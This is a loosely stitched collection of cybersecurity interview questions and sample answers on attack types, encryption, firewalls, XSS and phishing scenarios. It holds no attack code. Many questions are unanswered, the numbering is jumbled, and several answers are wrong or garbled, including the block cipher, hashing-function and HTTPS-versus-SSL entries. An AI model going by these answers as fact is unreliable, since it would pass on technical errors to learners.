Cyber security interviews questions

1. What are the common Cyberattacks?

Some basic Cyber attacks are as follows:
• Phishing: Phishing is the fraudulent practice of sending
spam emails by impersonating legitimate sources.
• Social Engineering Attacks: Social engineering attacks
can take many forms and can be carried out anywhere
human collaboration is required.
• Ransomware: Ransomware is documented encryption
programming that uses special cryptographic
calculations to encrypt records in a targeted framework.
• Cryptocurrency Hijacking: As digital currencies and
mining become more popular, so do cybercriminals.
They have found an evil advantage
in cryptocurrency mining, which involves complex
calculations to mine virtual currencies such as Bitcoin,
Ethereum, Monero, and Litecoin.
• Botnet Attacks: Botnet attacks often target large
organizations and entities that obtain vast amounts of
information. This attack allows programmers to control
countless devices in exchange for cunning intent.
2. What are the elements of cyber security?
There are various elements of cyber security as given below:
• Application Security: Application security is the most
important core component of cyber security, adding
 security highlights to applications during the
improvement period to defend against cyber attacks.
• Information Security: Information security is a
component of cyber security that describes how
information is protected against unauthorized access,
use, disclosure, disruption, alteration, or deletion.
• Network Security: Network security is the security
provided to a network from unauthorized access and
threats. It is the network administrator’s responsibility
to take precautions to protect the network from
potential security threats. Network security is another
element of IT security, the method of defending and
preventing unauthorized access to computer networks.
3. Define DNS?

The Domain Name System (DNS) translates domain names into IP

addresses that browsers use to load web pages. Every device
connected to the Internet has its own IP address,

4. What is a Firewall?

A firewall is a hardware or software-based network security device

that monitors all incoming and outgoing traffic and accepts, denies, or
drops that particular traffic based on a defined set of security rules.

5. What is a VPN?

VPN stands for Virtual Private Network. A virtual private network

(VPN) is a technology that creates a secure, encrypted connection over
an insecure network like the Internet.

6. What are the different sources of malware?

 • Worms: A worm is basically a type of malicious malware
that spreads rapidly from one computer to another via
email and file sharing. Worms do not require host
software or code to execute.
• Spyware: Spyware is basically a type of malicious
malware that runs in the background of your computer,
steals all your sensitive data, and reports this data to
remote attackers.
7. How does email work?
8. What is the difference between active and passive cyber
attacks?
. Define encryption and decryption?
Encryption is the process of transforming an ordinary
message (plaintext) into a meaningless message
(ciphertext). Decryption is the process of transforming a
meaningless message (ciphertext) into its original form
(plaintext).
9. What is the difference between plaintext and cleartext?
10. What is a block cipher?
Block Cipher Converts plaintext to ciphertext using one
block of plaintext at a time. Use 64-bit or 64-bit or greater.
The complexity of block ciphers is simple. The algorithm
modes used in block ciphers are ECB (Electronic Code Book)
and CBC (Cipher Block Chaining).
11. What is the Three-way handshake?
TCP uses a three-way handshake to establish reliable
connections. The connection is full-duplex, with
synchronization (SYN) and acknowledgment (ACK) on both
sides. The exchange of these four flags is done in three
steps: SYN, SYN to ACK, and ACK.
12. How can identity theft be prevented?
Steps to prevent identity theft:
• Use a strong password and don’t share her PIN with
anyone on or off the phone.
• Use two-factor notifications for email. Protect all your
devices with one password.
• Do not install software from the Internet. Do not post
confidential information on social media.
17. What are some common Hashing functions?
The hash function is a function that converts a specific numerical key or
alphanumeric key into a small practical integer value.

The types of Hash functions are given below:

1. Division Method.

2. Mid Square Method.

3. Folding Method.

4. Multiplication Method.

18. What do you mean by two-factor authentication?

Two-factor authentication refers to using any two independent
methods from a variety of authentication methods. Two-factor
authentication is used to ensure users have access to secure systems
and to enhance security
19. What does XSS stand for? How can it be prevented?

Cross-site scripting (XSS) is a vulnerability in web applications that

allows third parties to execute scripts on behalf of the web application
in the user’s browser. Cross-site scripting is one of the most prevalent
security vulnerabilities on the Internet today.

20. What do you mean by Shoulder Surfing?

A shoulder surfing attack describes a situation in which an attacker

can physically look at a device’s screen or keyboard and enter
passwords to obtain personal information

21. What is the difference between hashing and encryption?

22. Differentiate between Information security and information

assurance.

23. Write a difference between HTTPS and SSL.

HTTPS SSL

It is called Hypertext Transfer It is called Secured Socket

Protocol Secure. Layer

This is a more secure version of the It is the one and only

HTTP protocol with more cryptographic protocol in
encryption capabilities. computer networks.

24. What do you mean by System Hardening?

the idea of system hardening is to make a system more secure by

reducing the attack surface present in the design of the system. System
hardening is the process of reducing a system’s attack surface,

25. Differentiate between spear phishing and phishing.

Spear phishing: Spear phishing is a type of email attack that targets
specific individuals or organizations.

26. What do you mean by Perfect Forward Secrecy?

Perfect Forward Secrecy is a style of encryption that creates a

temporary exchange of secret keys between the server and client. It is
primarily used to call apps, websites, and messaging apps where user
privacy is paramount.

27. How to prevent MITM?

29. What is Public Key Infrastructure?

30. What is Spoofing?

Spoofing is a type of attack on computing devices in which an

attacker attempts to steal the identity of a legitimate user and
pretend to be someone else. This type of attack is performed to
compromise system security or steal user information.

Types of Spoofing:

• IP Spoofing: IP is a network protocol that allows messages to

be sent and received over the Internet. Her IP address of the
sender is included in the message header of all emails sent to
her messages (sender address).

• ARP Spoofing: ARP spoofing is a hacking technique that

redirects network traffic to hackers. Spying on LAN addresses
in both wired and wireless LAN networks is called ARP
spoofing.

• Email Spoofing: Email spoofing is the most common form of

identity theft on the Internet. Phishers use official logos and
headers to send emails to many addresses impersonating bank,
corporate, and law enforcement officials.
• Q2. What is the difference between Worms and Viruses?
• The key differences between worms and viruses are as follows:
 Parameters Worm Virus

It is a form of malware that replicates itself It is an executable code that attaches to

to spread to different computers across a another executable file to modify or delete
Definition network. data.

It does not need a host file to spread to a

Host device. It needs a host file to spread on a device.

Its objective is to consume computer

Objective resources like memory and bandwidth. Its objective is to modify information.

Speed It can spread very quickly over a network. It spreads slowly as compared to worms.

It is more harmful because it can access and

It is less harmful because it affects the modify sensitive information such as
Effect speed of the computer. passwords.

9. What is the role of cybersecurity in compliance and regulations?

The primary aim of compliance is to ensure that an organization is

adhering to the specified laws, guidelines, and policies. In the context
of cybersecurity, regulations, and compliance standards set the
minimum acceptable security requirements that an organization is
required to meet.

10. What are the essential skills needed for a career in cybersecurity?

12. What is a vulnerability?

A vulnerability is any drawback in a computer system, network, or

software that leaves it open to exploitation by a cyber attacker.

13. What is a DDoS attack?

One widely used means of attack is the DDoS attack, also known as
the distributed denial-of-service attack. It is a kind of cyber attack
that aims to disrupt the availability of targeted computer systems,
networks, or services by overwhelming them with a flood of
malicious traffic or resource-consuming requests.

14. What is the difference between symmetric and asymmetric

encryption?
15. What is a honeypot?

A honeypot is a tool used in the field of cybersecurity to detect and

deflect attacks from malicious actors. It is a decoy system that mimics
a legitimate system to lure in attackers.

What is Cyber Threat Intelligence?

Cyber Threat Intelligence, also known as Threat Intelligence, refers

to the strategic information that an organization uses to comprehend
the current or probable cyber risks that may impact its network and
assets.

17. What is the role of a Security Operations Center (SOC)?

A Security Operations Center (SOC) is the department responsible

for regular monitoring of an organization’s network and investigating
any potential issues.

19. What is the difference between a vulnerability and a risk?

A vulnerability is a weakness in a system, while a risk is a likelihood

of an attacker exploiting the vulnerability. There are four types of
vulnerabilities: network, operating system, process, and human
negligence.

Risks are of two types, external and internal. External risks are
associated with someone outside the organization, whereas internal
risks come from insiders with malicious intent or lack of knowledge
or training.

1. How are firewalls essential for network security?

Sample Answer: Firewalls block unauthorized access by acting as a

protective barrier and overseeing inbound and outbound traffic
according to the security regulations.

2. How can you secure a computer network?

Sample Answer: Regularly updating the system, using strong
passwords and firewalls, and implementing intrusion detection
systems can help secure a computer network

5. What is DNS?

Sample Answer: The Domain Name System is a virtual record of the

internet. It translates website names into IP addresses, which
computers use to find and connect to websites.

6. What are the different types of malware?

7. What do you mean by a Null Session?

A null session typically happens when an unauthorized user tries to

log into a system. This creates a security concern for the applications.
Additionally, null sessions are vulnerabilities found in the Common
Internet File System (CIFS) or SMB based on the operating system.

9. What would you do if you came across a security breach?

Sample Answer: I would isolate the compromised data to limit the

breach and notify the party affected by it. Additionally, I would also
investigate the reason behind the incident to implement recovery
methods and strengthen the security in order to prevent similar
incidents.

Q10. What do you understand by cookies in a web browser?

Sample Answer: Cookies are data stored by websites on a user’s

device. They are used to understand user preferences and website
information, They are also used to provide a more customized
browsing experience. Additionally, cookies are used to suggest
websites or resources the user is more prone to engage with.

. What are the various elements of cyber security?

5. Describe the concept of a VPN and its security benefits.

Answer:

A Virtual Private Network (VPN) creates a secure, encrypted

connection over a less secure network, such as the Internet.

Using a VPN enhances security by protecting sensitive data from

eavesdropping and allowing users to access resources securely,
especially when using public Wi-Fi.

7. Explain what an intrusion detection system (IDS) is.

Answer:

An Intrusion Detection System (IDS) monitors network traffic for

suspicious activity and potential threats, alerting administrators
when such activity is detected.

IDS can be classified as host-based or network-based, providing

insights into security breaches and helping organizations respond to
incidents effectively.

9. Describe the role of social engineering in cybersecurity attacks.

Social engineering involves manipulating individuals into divulging

confidential information or performing actions that compromise
security.

11. What is a security policy, and what should it include?

Answer:
A security policy is a formal document outlining an organization’s
approach to managing its information security.

It should include guidelines on acceptable use, access controls,

incident response, data protection measures, and employee
responsibilities, ensuring all stakeholders understand their roles in
maintaining security.

12. How does a man-in-the-middle attack work?

Answer:

A man-in-the-middle (MitM) attack occurs when an attacker

intercepts communication between two parties without their
knowledge.

3. Explain the principle of least privilege.

Answer:

The principle of least privilege dictates that users should have the
minimum level of access necessary to perform their job functions.

Implementing this principle reduces the attack surface and limits the
potential damage from compromised accounts or insider threats.

17. How do SSL and TLS enhance web security?

Answer:
SSL (Secure Sockets Layer) and TLS (Transport Layer Security) are
cryptographic protocols that provide secure communication over the
Internet.

18. What is a security incident response plan (IRP)?

Answer:

A security incident response plan (IRP) is a documented strategy

outlining how an organization will respond to security incidents.

20. How can organizations secure their cloud environments?

Answer:

Organizations can secure their cloud environments by implementing

strong access controls, data encryption, and regular security
assessments.

Using tools like cloud security posture management (CSPM) helps

identify misconfigurations, while adhering to compliance standards
ensures data protection in cloud environments.

21. What is a phishing simulation, and why is it beneficial?

Answer:

A phishing simulation is a training exercise where employees receive

simulated phishing emails to test their awareness and response.
22. Describe the difference between a vulnerability assessment and
a penetration test.

24. What is the purpose of a digital certificate?

Answer:

A digital certificate verifies the identity of an entity, ensuring that

public keys belong to the individual or organization they claim to
represent.

Digital certificates are essential for establishing trust in electronic

communications and are commonly used in SSL/TLS protocols for
secure web browsing.

25. How does a security information and event management (SIEM)

system work?

Answer:

A SIEM system collects and analyzes security data from across an

organization’s infrastructure to identify potential threats and
incidents.

28. How can you securely dispose of sensitive data?

Answer:

Securely disposing of sensitive data involves using methods like data

wiping, physical destruction of storage devices, or using certified
data destruction services.
These methods ensure that data cannot be recovered or accessed by
unauthorized individuals, maintaining confidentiality and compliance
with regulations.

29. What is the role of threat intelligence in cybersecurity?

Answer:

Threat intelligence involves gathering and analyzing information

about current and emerging threats to inform security decisions and
strategies.

33. What is a botnet, and how can it be used in attacks?

37. Describe the role of incident response teams (IRT).

Answer:

Incident response teams (IRT) are specialized groups within an

organization responsible for detecting, responding to, and recovering
from security incidents.

42. How do security audits contribute to an organization’s

cybersecurity posture?

Answer:

Security audits evaluate an organization’s security policies, practices,

and controls to identify weaknesses and ensure compliance with
regulations.

43. What is the role of a Chief Information Security Officer (CISO)?

Answer:

The Chief Information Security Officer (CISO) is responsible for

overseeing an organization’s information security strategy, policies,
and programs.

1. What is Cryptography?

Cryptography is the practice and study of techniques for securing

information and communication mainly to protect the data from
third parties that the data is not intended for.

3. What is the difference between IDS and IPS?

IDS is Intrusion Detection System and it only detects intrusions and

the administrator has to take care of preventing the intrusion.
Whereas, in IPS i.e., Intrusion Prevention System, the system
detects the intrusion and also takes actions to prevent the intrusion.

5. How is Encryption different from Hashing?

Both Encryption and Hashing are used to convert readable data into
an unreadable format. The difference is that the encrypted data can
be converted back to original data by the process of decryption but
the hashed data cannot be converted back to original data.

9. What are the response codes that can be received from a Web
Application?

1xx – Informational responses

2xx – Success
3xx – Redirection
4xx – Client-side error
5xx – Server-side error

10. What is traceroute? Why is it used?

Traceroute is a tool that shows the path of a packet. It lists all the
points (mainly routers) that the packet passes through. This is used
mostly when the packet is not reaching its destination. Traceroute is
used to check where the connection stops or breaks to identify the
point of failure.

11. What is the difference between HIDS and NIDS?

HIDS(Host IDS) and NIDS(Network IDS) are both Intrusion

Detection System and work for the same purpose i.e., to detect the
intrusions. The only difference is that the HIDS is set up on a
particular host/device. It monitors the traffic of a particular device
and suspicious system activities. On the other hand, NIDS is set up
on a network. It monitors traffic of all device of the network.

12. What are the steps to set up a firewall?

21. What do you understand by Risk, Vulnerability & Threat in a

network?

Threat: Someone with the potential to harm a system or an

organization
Vulnerability: Weakness in a system that can be exploited by a
potential hacker
Risk: Potential for loss or damage when threat exploits a
vulnerability

25. How would you reset a password-protected BIOS

configuration?

Since BIOS is a pre-boot system it has its own storage mechanism

for settings and preferences. A simple way to reset is by popping
out the CMOS battery so that the memory storing the settings lose
its power supply and as a result, it will lose its setting.

35. What is data protection in transit vs data protection at rest?

Data Protection in transit Data protection at rest

When data is going from server to When data just exists in its
client database or on its hard drive
Effective Data protection measures Data at rest is sometimes
for in-transit data are critical as data considered to be less
is less secure when in motion vulnerable than data in transit

37. What is Cognitive Cybersecurity?

Cognitive Cybersecurity is an application of AI technologies

patterned on human thought processes to detect threats and
protect physical and digital systems.

Self-learning security systems use data mining, pattern recognition,

and natural language processing to simulate the human brain,
albeit in a high-powered computer model.

Part B – Scenario Based Cybersecurity Interview Questions

1. Here’s a situation- You receive the following email from the help
desk:

Dear XYZ Email user,

To create space for more users we’re deleting all inactive email
accounts. Here’s what you have to send to save your account from
getting deleted:

• Name (first and last):

• Email Login:
• Password:
• Date of birth:
• Alternate email

If we don’t receive the above information from you by the end of the
week, your email account will be terminated.

If you’re a user what do you do? Justify your answer.

This email is a classic example of “phishing” – trying to trick you
into “biting”. The justification is the generalized way of addressing
the receiver which is used in mass spam emails.

Above that, a corporate company will never ask for personal details
on mail.

They want your information. Don’t respond to email, instant

messages (IM), texts, phone calls, etc., asking you for your
password or other private information.

You should never disclose your password to anyone, even if they

say they work for UCSC, ITS, or other campus organizations.

2. A friend of yours sends an e-card to your mail. You have to click

on the attachment to get the card.

What do you do? Justify your answer

There are four risks here:

• Some attachments contain viruses or other malicious

programs, so just in general, it’s risky to open unknown or
unsolicited attachments.
• Also, in some cases just clicking on a malicious link can infect
a computer, so unless you are sure a link is safe, don’t click on
it.
• Email addresses can be faked, so just because the email says it
is from someone you know, you can’t be certain of this without
checking with the person.
• Finally, some websites and links look legitimate, but they’re
really hoaxes designed to steal your information.

3. One of the staff members in XYZ subscribes to many free

magazines. Now, to activate her subscriptions one of the magazines
asked for her month of birth, second asked for her year of birth, the
other one asked for her maiden name.
What do you infer from this situation? Justify.

All three newsletters probably have the same parent company or

are distributed through the same service. The parent company or
service can combine individual pieces of seemingly-harmless
information and use or sell it for identity theft

It is even possible that there is a fourth newsletter that asks for a

day of birth as one of the activation questions

Often questions about personal information are optional. In addition

to being suspicious about situations like the one described here,
never provide personal information when it is not legitimately
necessary, or to people or companies, you don’t personally know.

4. In our computing labs, print billing is often tied to the user’s

login. Sometimes people call to complain about bills for printing
they never did only to find out that the bills are, indeed, correct.

What do you infer from this situation? Justify.

Sometimes they realize they loaned their account to a friend who

couldn’t remember his/her password, and the friend did the
printing. Thus the charges. It’s also possible that somebody came in
behind them and used their account

This is an issue with shared or public computers in general. If you

don’t log out of the computer properly when you leave, someone
else can come in behind you and retrieve what you were doing, use
your accounts, etc. Always log out of all accounts, quit programs,
and close browser windows before you walk away.

5. There is this case that happened in my computer lab. A friend of

mine used their yahoo account at a computer lab on campus. She
ensured that her account was not left open before she left the lab.
Someone came after her and used the same browser to re-access
her account. and they started sending emails from it.
What do you think might be going on here?

The first person probably didn’t log out of her account, so the new
person could just go to history and access her account.

Another possibility is that she did log out, but didn’t clear her web
cache. (This is done through the browser menu to clear pages that
the browser has saved for future use.)

6. Two different offices on campus are working to straighten out an

error in an employee’s bank account due to a direct deposit mistake.

Office #1 emails the correct account and deposit information to

office #2, which promptly fixes the problem.

The employee confirms with the bank that everything has, indeed,
been straightened out.

What is wrong here?

Account and deposit information is sensitive data that could be

used for identity theft. Sending this or any kind of sensitive
information by email is very risky because email is typically not
private or secure. Anyone who knows how can access it anywhere
along its route.

As an alternative, the two offices could have called each other or

worked with ITS to send the information a more secure way.

7. The mouse on your computer screen starts to move around on its

own and click on things on your desktop. What do you do?

a) Call your co-workers over so they can see

b) Disconnect your computer from the network

c) Unplug your mouse

d) Tell your supervisor

e) Turn your computer off

f) Run anti-virus

g) All of the above

Select all the options that apply.

Right answer is B & D.

This is definitely suspicious. Immediately report the problem to your

supervisor and the ITS Support Center: [Link], 459-
HELP (4357), help@[Link] or Kerr Hall room 54, M-F 8AM-5PM

Also, since it seems possible that someone is controlling the

computer remotely, it is best if you can disconnect the computer
from the network (and turn off wireless if you have it) until help
arrives. If possible, don’t turn off the computer.

8. Below is a list of passwords pulled out a database.

A. @#$)*&^%

B. akHGksmLN

C.UcSc4Evr!

D.Password1

Which of the following passwords meets UCSC’s password

requirements?

Answer is UcSc4Evr!

This is the only choice that meets all of the following UCSC
requirements:

At least 8 characters in length

Contains at least 3 of the following 4 types of characters: lower
case letters, upper case letters, numbers, special characters

Not a word preceded or followed by a digit

9. You receive an email from your bank telling you there is a

problem with your account. The email provides instructions and a
link so you can log into your account and fix the problem.

What should you do?

Delete the email. Better yet, use the web client (e.g. gmail, yahoo
mail, etc.) and report it as spam or phishing, then delete it.

Any unsolicited email or phone call asking you to enter your account
information, disclose your password, financial account information,
social security number, or other personal or private information is
suspicious – even if it appears to be from a company you are familiar
with. Always contact the sender using a method you know is
legitimate to verify that the message is from them.

10. A while back, the IT folks got a number of complaints that one
of our campus computers was sending out Viagra spam. They
checked it out, and the reports were true: a hacker had installed a
program on the computer that made it automatically send out tons
of spam email without the computer owner’s knowledge.

How do you think the hacker got into the computer to set this up?

This was actually the result of a hacked password. Using passwords

that can’t be easily guessed, and protecting your passwords by not
sharing them or writing them down can help to prevent this.
Passwords should be at least 8 characters in length and use a
mixture of upper and lower case letters, numbers, and symbols.

Even though in this case it was a hacked password, other things

that could possibly lead to this are:

• Out of date patches/updates

• No anti-virus software or out of date anti-virus software

17. What is the concept of digital signature?

If you get an email, you probably don’t worry about whether it
is really from the person it says it’s from.